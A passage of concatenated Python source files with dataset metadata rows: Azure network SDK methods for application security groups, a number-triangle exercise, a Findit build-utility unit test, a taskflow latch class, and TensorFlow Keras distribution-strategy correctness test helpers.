        polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.PollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of LROPoller that returns either ApplicationSecurityGroup or the result of cls(response)
        :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroup]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroup"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            raw_result = self._update_tags_initial(
                resource_group_name=resource_group_name,
                application_security_group_name=application_security_group_name,
                parameters=parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            deserialized = self._deserialize('ApplicationSecurityGroup', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        if cont_token:
            return LROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups/{applicationSecurityGroupName}'} # type: ignore
    def list_all(
        self,
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
        """Gets all application security groups in a subscription.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_all.metadata['url'] # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            else:
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = 'application/json'
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
    def list(
        self,
        resource_group_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["models.ApplicationSecurityGroupListResult"]
        """Gets all the application security groups in a resource group.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ApplicationSecurityGroupListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_02_01.models.ApplicationSecurityGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["models.ApplicationSecurityGroupListResult"]
        error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2019-02-01"
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list.metadata['url'] # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
            else:
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = 'application/json'
            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            deserialized = self._deserialize('ApplicationSecurityGroupListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationSecurityGroups'} # type: ignore
| [
"[email protected]"
]
| |
17a937aeee7d4803c81b66038606d007a43ba375 | 01c3ff1d74e754e0d4ce0fb7f8a8b329ec3766e1 | /python_exercises/19others/pattern5.py | 483e78e63f8ebcaf6ba87bcd805f663dff7c4353 | []
| no_license | vineel2014/Pythonfiles | 5ad0a2b824b5fd18289d21aa8306099aea22c202 | 0d653cb9659fe750cf676a70035ab67176179905 | refs/heads/master | 2020-04-28T03:56:22.713558 | 2019-03-11T08:38:54 | 2019-03-11T08:38:54 | 123,681,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | def printTri(n):
for i in range(1,n+1):
print(' '.join(str(i)*i))
n=int(input("enter range to display number triangle"))
printTri(n)
| [
"[email protected]"
]
| |
01eab334f8dd405e5b1de91172d26a98b76d39ee | a034d4ba39789e4a351112c46dd04a38180cd06c | /appengine/findit/findit_v2/services/test/build_util_test.py | 85dd03198119d71eff746fb8c2caeb9a58e5112b | [
"BSD-3-Clause"
]
| permissive | asdfghjjklllllaaa/infra | 050ad249ab44f264b4e2080aa9537ce74aafb022 | 8f63af54e46194cd29291813f2790ff6e986804d | refs/heads/master | 2023-01-10T21:55:44.811835 | 2019-07-01T14:03:32 | 2019-07-01T14:03:32 | 194,691,941 | 1 | 0 | BSD-3-Clause | 2023-01-07T07:12:37 | 2019-07-01T14:45:29 | Python | UTF-8 | Python | false | false | 1,905 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from buildbucket_proto import common_pb2
from buildbucket_proto.build_pb2 import Build
from buildbucket_proto.build_pb2 import BuilderID
from buildbucket_proto.step_pb2 import Step
from findit_v2.services import build_util
from findit_v2.services.context import Context
from findit_v2.services.failure_type import StepTypeEnum
class BuildUtilTest(unittest.TestCase):
  """Unit tests for the findit_v2 build_util helpers."""

  def testGetFailedStepsInBuild(self):
    """A failed build with one failing 'compile' step yields one COMPILE entry."""
    builder = BuilderID(project='chromium', bucket='try', builder='linux-rel')
    build = Build(
        id=8000000000123,
        builder=builder,
        number=123,
        status=common_pb2.FAILURE)
    passing_step = Step(name='s1', status=common_pb2.SUCCESS)
    failing_step = Step(name='compile', status=common_pb2.FAILURE)
    build.steps.extend([passing_step, failing_step])
    context = Context(
        luci_project_name='chromium',
        gitiles_host='gitiles.host.com',
        gitiles_project='project/name',
        gitiles_ref='ref/heads/master',
        gitiles_id='git_sha')

    failed_steps = build_util.GetFailedStepsInBuild(context, build)

    self.assertEqual(1, len(failed_steps))
    step, step_type = failed_steps[0]
    self.assertEqual('compile', step.name)
    self.assertEqual(StepTypeEnum.COMPILE, step_type)

  def testGetAnalyzedBuildIdFromRerunBuild(self):
    """The analyzed_build_id tag round-trips through a rerun build."""
    analyzed_build_id = 8000000000123
    rerun_build = Build(tags=[{
        'key': 'analyzed_build_id',
        'value': str(analyzed_build_id)
    }])
    self.assertEqual(analyzed_build_id,
                     build_util.GetAnalyzedBuildIdFromRerunBuild(rerun_build))

  def testGetAnalyzedBuildIdFromRerunBuildNoAnalyzedBuildId(self):
    """A build without the tag has no analyzed build id."""
    self.assertIsNone(build_util.GetAnalyzedBuildIdFromRerunBuild(Build()))
| [
"[email protected]"
]
| |
c3ff78ade7a48d81ea1bf2007c51af01e08bfb47 | 92e3a6424326bf0b83e4823c3abc2c9d1190cf5e | /scripts/icehouse/opt/stack/taskflow/taskflow/types/latch.py | 0945a286cd816a0b0bdfd456401608455ecb04dd | [
"Apache-2.0"
]
| permissive | AnthonyEzeigbo/OpenStackInAction | d6c21cf972ce2b1f58a93a29973534ded965d1ea | ff28cc4ee3c1a8d3bbe477d9d6104d2c6e71bf2e | refs/heads/master | 2023-07-28T05:38:06.120723 | 2020-07-25T15:19:21 | 2020-07-25T15:19:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,432 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
from taskflow.types import timing as tt
class Latch(object):
    """A class that ensures N-arrivals occur before unblocking.

    TODO(harlowja): replace with http://bugs.python.org/issue8777 when we no
    longer have to support python 2.6 or 2.7 and we can only support 3.2 or
    later.
    """

    def __init__(self, count):
        """:param count: number of countdown() calls needed to release waiters."""
        count = int(count)
        if count <= 0:
            raise ValueError("Count must be greater than zero")
        self._count = count
        self._cond = threading.Condition()

    @property
    def needed(self):
        """Returns how many decrements are needed before latch is released."""
        # Clamp at zero: extra countdown() calls may push _count negative.
        return max(0, self._count)

    def countdown(self):
        """Decrements the internal counter due to an arrival."""
        # ``with`` replaces the manual acquire/try/finally/release pattern;
        # the lock is released even if notify_all() raises.
        with self._cond:
            self._count -= 1
            if self._count <= 0:
                self._cond.notify_all()

    def wait(self, timeout=None):
        """Waits until the latch is released.

        NOTE(harlowja): if a timeout is provided this function will wait
        until that timeout expires, if the latch has been released before the
        timeout expires then this will return True, otherwise it will
        return False.
        """
        w = None
        if timeout is not None:
            w = tt.StopWatch(timeout).start()
        with self._cond:
            while self._count > 0:
                if w is not None:
                    if w.expired():
                        return False
                    # Only wait for the remaining slice of the budget.
                    timeout = w.leftover()
                self._cond.wait(timeout)
            return True
"[email protected]"
]
| |
27e9ed8c37a43ac6f6365ba000efcb25594e79f7 | e5e0d729f082999a9bec142611365b00f7bfc684 | /tensorflow/python/keras/distribute/keras_correctness_test_base.py | 73b899ba3cc9bc01310730fc690ff2d3340a15b0 | [
"Apache-2.0"
]
| permissive | NVIDIA/tensorflow | ed6294098c7354dfc9f09631fc5ae22dbc278138 | 7cbba04a2ee16d21309eefad5be6585183a2d5a9 | refs/heads/r1.15.5+nv23.03 | 2023-08-16T22:25:18.037979 | 2023-08-03T22:09:23 | 2023-08-03T22:09:23 | 263,748,045 | 763 | 117 | Apache-2.0 | 2023-07-03T15:45:19 | 2020-05-13T21:34:32 | C++ | UTF-8 | Python | false | false | 22,395 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Correctness tests for tf.keras using DistributionStrategy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl.testing import parameterized
import numpy as np
import six
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import distribute_lib
from tensorflow.python.distribute import mirrored_strategy
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.distribute import tpu_strategy
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import random_seed
from tensorflow.python.keras.distribute import distributed_training_utils
from tensorflow.python.util import nest
# Seed applied to both numpy and TF RNGs so test runs are reproducible.
_RANDOM_SEED = 1337
# Number of evaluation steps' worth of data generated by the embedding base.
_EVAL_STEPS = 20
# Global (cross-replica) batch size used throughout these tests.
_GLOBAL_BATCH_SIZE = 64
# Note: Please make sure the tests in this file are also covered in
# keras_backward_compat_test for features that are supported with both APIs.
# Full set of distribution strategies exercised by the correctness tests.
all_strategies = [
    strategy_combinations.default_strategy,
    strategy_combinations.one_device_strategy,
    strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
    strategy_combinations.mirrored_strategy_with_two_gpus,
    strategy_combinations.tpu_strategy,  # steps_per_run=2
    strategy_combinations.tpu_strategy_one_step,
]
def eager_mode_test_configuration():
  """Returns eager-mode combos over numpy/dataset and validation-data flags."""
  configs = combinations.combine(
      mode='eager', use_numpy=[True, False], use_validation_data=[True, False])
  return configs
def graph_mode_test_configuration():
  """Returns graph-mode combos over numpy/dataset and validation-data flags."""
  configs = combinations.combine(
      mode='graph', use_numpy=[True, False], use_validation_data=[True, False])
  return configs
def all_strategy_and_input_config_combinations():
  """Crosses every strategy with every eager/graph input configuration."""
  strategy_combos = combinations.combine(
      distribution=all_strategies,
      experimental_run_tf_function=[True, False])
  input_configs = (eager_mode_test_configuration() +
                   graph_mode_test_configuration())
  return combinations.times(strategy_combos, input_configs)
def strategy_minus_tpu_and_input_config_combinations_eager():
  """Crosses the non-TPU strategies with the eager-mode input configurations."""
  non_tpu_strategies = combinations.combine(
      distribution=strategy_combinations.strategies_minus_tpu)
  return combinations.times(non_tpu_strategies, eager_mode_test_configuration())
def strategies_for_embedding_models():
  """Returns distribution strategies to test for embedding models.

  Since embedding models take longer to train, we disregard DefaultStrategy
  in order to prevent testing timeouts.
  """
  selected = []
  for candidate in all_strategies:
    if (candidate.required_tpu or candidate.required_gpus or
        candidate is strategy_combinations.one_device_strategy):
      selected.append(candidate)
  return selected
def test_combinations_for_embedding_model():
  """Builds graph-mode combos for all embedding strategies plus eager combos
  for the non-TPU subset."""
  # TODO(sourabhbajaj): Enable tests for eager mode
  embedding_strategies = strategies_for_embedding_models()
  eager_mode_strategies = [
      s for s in embedding_strategies if not s.required_tpu
  ]
  graph_combos = combinations.times(
      combinations.combine(
          distribution=embedding_strategies,
          experimental_run_tf_function=[True, False]),
      graph_mode_test_configuration())
  eager_combos = combinations.times(
      combinations.combine(
          distribution=eager_mode_strategies,
          experimental_run_tf_function=[False]),
      eager_mode_test_configuration())
  return graph_combos + eager_combos
def test_combinations_with_tpu_strategies():
  """Crosses the two TPU strategies with the graph-mode configurations."""
  tpu_strategies = [
      strategy_combinations.tpu_strategy,
      strategy_combinations.tpu_strategy_one_step
  ]
  tpu_combos = combinations.combine(distribution=tpu_strategies)
  return combinations.times(tpu_combos, graph_mode_test_configuration())
class MaybeDistributionScope(object):
  """Context manager that enters a strategy scope only when one is given."""

  def __init__(self, distribution):
    self._distribution = distribution
    self._scope = None

  def __enter__(self):
    if not self._distribution:
      # No strategy supplied: behave as a no-op context.
      return
    self._scope = self._distribution.scope()
    self._scope.__enter__()

  def __exit__(self, exc_type, value, traceback):
    if not self._distribution:
      return
    active_scope = self._scope
    self._scope = None
    active_scope.__exit__(exc_type, value, traceback)
def batch_wrapper(dataset, batch_size, repeat=None):
  """Returns *dataset* batched by *batch_size*, repeated first when requested."""
  ds = dataset.repeat(repeat) if repeat else dataset
  return ds.batch(batch_size)
def get_batch_size(global_batch_size, distribution):
  """Returns the batch size to pass to Keras for *distribution*.

  Strategies that do not support a global batch size receive a
  per-replica batch size instead.
  """
  # TODO(b/118776054): Use global batch size for Keras/DS support.
  if distribution and not distributed_training_utils.global_batch_size_supported(
      distribution):
    return global_batch_size // distribution.num_replicas_in_sync
  return global_batch_size
def get_data_size(data):
  """Gets the size of data in list, tuple, dict, or a numpy array.

  For lists/tuples the length of the first element is returned (the
  elements are parallel arrays); for dicts, the length of any one value.
  """
  assert isinstance(data, (np.ndarray, list, dict, tuple))
  if isinstance(data, np.ndarray):
    return len(data)
  if isinstance(data, (list, tuple)):
    return len(data[0])
  # Builtin iteration replaces the old six.next(six.itervalues(...));
  # next(iter(d.values())) works on both Python 2 and 3.
  return len(next(iter(data.values())))
def get_shapes(data):
  """Returns the nested structure of `.shape`s of *data*, or None if any
  leaf lacks a shape attribute."""
  for leaf in nest.flatten(data):
    if not hasattr(leaf, 'shape'):
      return None
  return nest.map_structure(lambda x: x.shape, data)
def get_correctness_test_inputs(use_numpy, use_validation_data,
                                with_distribution, x_train, y_train, x_eval,
                                y_eval, x_predict, training_epochs):
  """Generates the inputs for correctness check when enable Keras with DS.

  Returns a (training_inputs, eval_inputs, predict_inputs) tuple of kwargs
  dicts for model.fit/evaluate/predict; eval_inputs is None when evaluation
  happens through fit()'s validation_data instead.
  """
  global_batch_size = _GLOBAL_BATCH_SIZE
  batch_size = get_batch_size(global_batch_size, with_distribution)
  if use_numpy:
    training_inputs = {
        'batch_size': batch_size,
        'x': x_train,
        'y': y_train,
        'epochs': training_epochs,
        'shuffle': False,
    }
    if use_validation_data:
      eval_inputs = None
      training_inputs['validation_data'] = (x_eval, y_eval)
    else:
      eval_inputs = {
          'batch_size': batch_size,
          'x': x_eval,
          'y': y_eval,
      }
    predict_inputs = {'x': x_predict}
  else:
    training_data_size = get_data_size(x_train)
    # For dataset inputs, we do not pass batch_size to
    # keras.fit/evaluate/predict. The batch size is part of the dataset.
    train_dataset = dataset_ops.Dataset.from_tensor_slices((x_train, y_train))
    x = batch_wrapper(train_dataset, batch_size, repeat=training_epochs)

    steps_per_epoch = int(np.ceil(1.0 * training_data_size / global_batch_size))
    training_inputs = {
        'batch_size': None,
        'x': x,
        'y': None,
        'epochs': training_epochs,
        'shuffle': False,
        'steps_per_epoch': steps_per_epoch
    }
    if use_validation_data:
      eval_inputs = None  # Remove the eval_inputs
      eval_dataset = dataset_ops.Dataset.from_tensor_slices((x_eval, y_eval))
      x = batch_wrapper(eval_dataset, batch_size)
      training_inputs['validation_data'] = x
      training_inputs['validation_steps'] = 5
    else:
      eval_dataset = dataset_ops.Dataset.from_tensor_slices((x_eval, y_eval))
      x = batch_wrapper(eval_dataset, batch_size)
      eval_steps = int(np.ceil(1.0 * get_data_size(x_eval) / global_batch_size))
      eval_inputs = {
          'batch_size': None,
          'x': x,
          'y': None,
          'steps': eval_steps,
      }

    # Prediction always consumes the whole predict set in a single step.
    predict_batch_size = get_batch_size(
        get_data_size(x_predict), with_distribution)
    predict_dataset = dataset_ops.Dataset.from_tensor_slices(x_predict)
    predict_dataset = batch_wrapper(predict_dataset, predict_batch_size)
    predict_inputs = {
        'steps': 1,
        'x': predict_dataset,
    }

  return training_inputs, eval_inputs, predict_inputs
def fit_eval_and_predict(initial_weights,
                         input_fn,
                         model_fn,
                         experimental_run_tf_function=None,
                         distribution=None,
                         is_stateful_model=False):
  """Generates results for fit/predict/evaluate for given model.

  Runs two fit/evaluate rounds and collects histories, eval results,
  weights and predictions into a dict keyed by stage name
  ('training_history_1', 'weights_1', 'predict_result_0', ...).
  """
  training_inputs, eval_inputs, predict_inputs = input_fn()
  model = model_fn(
      experimental_run_tf_function=experimental_run_tf_function,
      initial_weights=initial_weights,
      distribution=distribution,
      input_shapes=get_shapes(training_inputs['x']))

  result = {}
  result['training_history_1'] = model.fit(**training_inputs).history

  if eval_inputs is not None:
    result['eval_result_1'] = model.evaluate(**eval_inputs)

  result['weights_1'] = model.get_weights()

  if predict_inputs is not None:
    # Check correctness of the result of predict() invoked
    # multiple times -- as for stateful models, result of
    # predict may differ for each batch.
    predict_length = 1
    if is_stateful_model:
      predict_length = 3
    for i in range(predict_length):
      result_key = 'predict_result_{}'.format(i)
      result[result_key] = model.predict(**predict_inputs)

  # Train and eval again to mimic user's flow.

  result['training_history_2'] = model.fit(**training_inputs).history

  if eval_inputs is not None:
    result['eval_result_2'] = model.evaluate(**eval_inputs)

  result['weights_2'] = model.get_weights()

  return result
def compare_results(results_with_ds,
                    results_without_ds,
                    distribution,
                    testcase,
                    partial_last_batch=None):
  """Compares results of model compiled with/without distribution strategy.

  Asserts (via testcase.assertAllClose) that every stage result produced
  with the strategy matches the corresponding no-strategy result within a
  tolerance chosen per strategy and per stage.
  """
  if partial_last_batch == 'train_and_eval':
    # We relax the tolerence a lot in the partial last batch case as
    # 1. the examples in uneven batches may have different weights when
    #    applying the gradients in the distributed case.
    # 2. TF Keras and TF Keras DS have different ways to handle the case when
    #    training with epochs > 1 with numpy inputs. In TF Keras, every epoch
    #    may have a partial batch. While in TF Keras DS, as we convert
    #    numpy inputs into dataset, it will do a repeat() first and calculate
    #    steps_per_epoch, so it will at most have one partial batch. This
    #    makes the 1-CPU result even different.
    default_tolerance = 1e-3
    relaxed_tolerance = 1e-3
  else:
    default_tolerance = 1e-5
    relaxed_tolerance = 1e-4

  def _get_compare_result_tolerance(key):
    """Returns tolerance to compare results."""
    # TODO(b/119257215): For MirroredStrategy, weights are not exactly the same,
    # so use larger tolerance for now. Predict should be related to weights.
    if (isinstance(distribution,
                   (mirrored_strategy.MirroredStrategy,
                    distribute_lib._DefaultDistributionStrategy)) and  # pylint: disable=protected-access
        key.startswith(('weights_1', 'weights_2', 'predict_result'))):
      return relaxed_tolerance

    return default_tolerance

  for key in sorted(results_with_ds.keys()):
    if (key.startswith('training_history') and
        isinstance(distribution,
                   (tpu_strategy.TPUStrategy, tpu_strategy.TPUStrategyV1)) and
        distribution.extended.steps_per_run > 1):
      # TODO(b/119894254): Enable this test for all cases once the
      # underlying bug is fixed.
      continue

    tolerance = _get_compare_result_tolerance(key)

    # We don't compare the loss as loss is currently not computed as metric
    # in Keras, the loss value is inaccurate for last partial batch due to
    # more weights for the last batch samples.
    if partial_last_batch is not None:
      if key.startswith('eval_result'):
        results_with_ds[key] = results_with_ds[key][1:]
        results_without_ds[key] = results_without_ds[key][1:]
      if key.startswith('training_history'):
        results_with_ds[key]['val_loss'] = 0
        results_without_ds[key]['val_loss'] = 0

    testcase.assertAllClose(
        results_with_ds[key],
        results_without_ds[key],
        atol=tolerance,
        rtol=tolerance,
        msg='Fail to assert {}.'.format(key))
def should_skip_tpu_with_eager(distribution):
  """True when running eagerly against a TPU strategy."""
  is_tpu_strategy = isinstance(
      distribution, (tpu_strategy.TPUStrategy, tpu_strategy.TPUStrategyV1))
  return context.executing_eagerly() and is_tpu_strategy
class LearningRateBatchScheduler(keras.callbacks.Callback):
  """Callback that reassigns the model's learning rate as batches progress."""

  def __init__(self, update_freq=None):
    # When set, only update every `update_freq` batches; otherwise every batch.
    self._update_freq = update_freq

  def on_batch_begin(self, batch, logs=None):
    freq = self._update_freq
    if freq and batch % freq != 0:
      return
    # To avoid divergence, limit the value range.
    new_lr = 0.001 * (batch % 10)
    keras.backend.set_value(self.model.optimizer.lr, new_lr)
class TestDistributionStrategyCorrectnessBase(test.TestCase,
                                              parameterized.TestCase):
  """Model agnostic testing infra to test correctness of Keras models."""

  def set_up_test_config(self,
                         use_numpy=False,
                         use_validation_data=False,
                         with_batch_norm=False):
    """Records the test configuration and seeds numpy/TF RNGs."""
    self.use_numpy = use_numpy
    self.use_validation_data = use_validation_data
    self.with_batch_norm = with_batch_norm

    keras.backend.set_image_data_format('channels_last')
    np.random.seed(_RANDOM_SEED)
    random_seed.set_random_seed(_RANDOM_SEED)

  def get_data(self):
    """Returns (x_train, y_train, x_predict); labels equal the binary inputs."""
    num_samples = 10000
    x_train = np.random.randint(0, 2, num_samples)
    x_train = np.reshape(x_train, (num_samples, 1))
    y_train = x_train
    return (x_train.astype('float32'), y_train.astype('float32'), None)

  def get_data_with_partial_last_batch(self):
    # Subclasses that exercise partial batches must override this.
    raise NotImplementedError

  def get_data_with_partial_last_batch_eval(self):
    # Subclasses that exercise partial eval batches must override this.
    raise NotImplementedError

  def get_input_for_correctness_test(self, **kwargs):
    """Generates inputs that are dictionaries.

    We only provide a default implementation of this method here. If you need
    more customized way of providing input to your model, overwrite this method.

    Arguments:
      **kwargs: key word arguments about how to create the input dictionaries

    Returns:
      Three dictionaries representing the input for fit(), evalutate() and
      predict()
    """
    return get_correctness_test_inputs(**kwargs)

  def get_model(self,
                distribution=None,
                experimental_run_tf_function=None,
                input_shapes=None):
    # Subclasses must build and return the model under test.
    raise NotImplementedError

  def run_correctness_test(self,
                           distribution,
                           use_numpy,
                           use_validation_data,
                           experimental_run_tf_function=None,
                           with_batch_norm=False,
                           is_stateful_model=False,
                           partial_last_batch=None,
                           training_epochs=2):
    """Trains the model with and without the strategy and compares results."""
    with self.cached_session():
      self.set_up_test_config(use_numpy, use_validation_data, with_batch_norm)

      if partial_last_batch == 'eval':
        x_train, y_train, x_eval, y_eval, x_predict = (
            self.get_data_with_partial_last_batch_eval())
      elif partial_last_batch == 'train_and_eval':
        x_train, y_train, x_eval, y_eval, x_predict = (
            self.get_data_with_partial_last_batch())
      else:
        x_train, y_train, x_predict = self.get_data()
        x_eval = x_train
        y_eval = y_train

      # The model is built once and the initial weights are saved.
      # This is used to initialize the model for both the distribution and
      # non-distribution run.
      model = self.get_model(
          experimental_run_tf_function=experimental_run_tf_function,
          input_shapes=get_shapes(x_train))
      initial_weights = model.get_weights()

      ds_input_fn = functools.partial(
          self.get_input_for_correctness_test,
          use_numpy=use_numpy,
          use_validation_data=use_validation_data,
          with_distribution=distribution,
          x_train=x_train,
          y_train=y_train,
          x_eval=x_eval,
          y_eval=y_eval,
          x_predict=x_predict,
          training_epochs=training_epochs)

      nods_input_fn = functools.partial(
          self.get_input_for_correctness_test,
          use_numpy=use_numpy,
          use_validation_data=use_validation_data,
          with_distribution=None,
          x_train=x_train,
          y_train=y_train,
          x_eval=x_eval,
          y_eval=y_eval,
          x_predict=x_predict,
          training_epochs=training_epochs)

      results_with_ds = fit_eval_and_predict(
          initial_weights,
          input_fn=ds_input_fn,
          model_fn=self.get_model,
          experimental_run_tf_function=experimental_run_tf_function,
          distribution=distribution,
          is_stateful_model=is_stateful_model)
      results_without_ds = fit_eval_and_predict(
          initial_weights,
          input_fn=nods_input_fn,
          model_fn=self.get_model,
          experimental_run_tf_function=experimental_run_tf_function,
          distribution=None,
          is_stateful_model=is_stateful_model)

      # First, special case, for multi-replica distributed training, batch
      # norm is not aggregated globally. So it is expected to have different
      # weights.
      if (self.with_batch_norm and distribution.num_replicas_in_sync > 1):
        with self.assertRaises(AssertionError):
          compare_results(
              results_with_ds,
              results_without_ds,
              distribution,
              testcase=self,
              partial_last_batch=partial_last_batch)
      else:
        compare_results(
            results_with_ds,
            results_without_ds,
            distribution,
            testcase=self,
            partial_last_batch=partial_last_batch)

  def get_input_for_dynamic_lr_test(self, **kwargs):
    """Generates inputs that are dictionaries.

    We only provide a default implementation of this method here. If you need
    more customized way of providing input to your model, overwrite this method.

    Arguments:
      **kwargs: key word arguments about how to create the input dictionaries

    Returns:
      Three dictionaries representing the input for fit(), evalutate() and
      predict()
    """
    training_input = kwargs
    return training_input, None, None

  def run_dynamic_lr_test(self,
                          distribution,
                          experimental_run_tf_function=None):
    """Trains with a per-batch LR schedule, with and without the strategy."""
    with self.cached_session():
      self.set_up_test_config()

      x_train, y_train, _ = self.get_data()
      model = self.get_model(
          experimental_run_tf_function=experimental_run_tf_function,
          input_shapes=get_shapes(x_train))
      initial_weights = model.get_weights()
      update_freq = None

      if (isinstance(distribution, tpu_strategy.TPUStrategyV1) and
          distribution.extended.steps_per_run > 1):
        # For TPUStrategy with steps_per_run > 1, the callback is not invoked
        # every step. So, to compare the CPU/TPU, we let the CPU to behave the
        # same as TPU.
        update_freq = distribution.extended.steps_per_run

      training_epochs = 2
      global_batch_size = 64

      ds_batch_size = get_batch_size(global_batch_size, distribution)
      nods_batch_size = get_batch_size(global_batch_size, None)

      ds_input_fn = functools.partial(
          self.get_input_for_dynamic_lr_test,
          x=x_train,
          y=y_train,
          batch_size=ds_batch_size,
          shuffle=False,
          epochs=training_epochs,
          callbacks=[LearningRateBatchScheduler(update_freq)],
          validation_data=(x_train, y_train))

      nods_input_fn = functools.partial(
          self.get_input_for_dynamic_lr_test,
          x=x_train,
          y=y_train,
          batch_size=nods_batch_size,
          shuffle=False,
          epochs=training_epochs,
          callbacks=[LearningRateBatchScheduler(update_freq)],
          validation_data=(x_train, y_train))

      results_with_ds = fit_eval_and_predict(
          initial_weights,
          input_fn=ds_input_fn,
          model_fn=self.get_model,
          experimental_run_tf_function=experimental_run_tf_function,
          distribution=distribution)
